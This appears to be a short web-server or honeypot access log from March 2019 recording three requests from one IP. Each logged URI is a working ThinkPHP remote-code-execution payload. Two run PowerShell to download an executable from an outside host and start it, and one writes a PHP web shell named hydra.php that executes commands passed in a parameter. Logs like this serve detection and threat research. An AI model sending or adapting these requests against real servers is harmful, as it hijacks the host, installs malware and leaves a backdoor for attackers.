| timestamp | ip | host | browser | uri |
|---|
| 20190325-23:37:26 | 119.186.62.46 | 119.186.62.46 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/zhkiijvtawtokyv16365.exe');start C:/Windows/temp/zhkiijvtawtokyv16365.exe |
| 20190325-23:37:27 | 119.186.62.46 | 119.186.62.46 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php |
| 20190325-23:37:27 | 119.186.62.46 | 119.186.62.46 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/zhkiijvtawtokyv16365.exe');start C:/Windows/temp/zhkiijvtawtokyv16365.exe |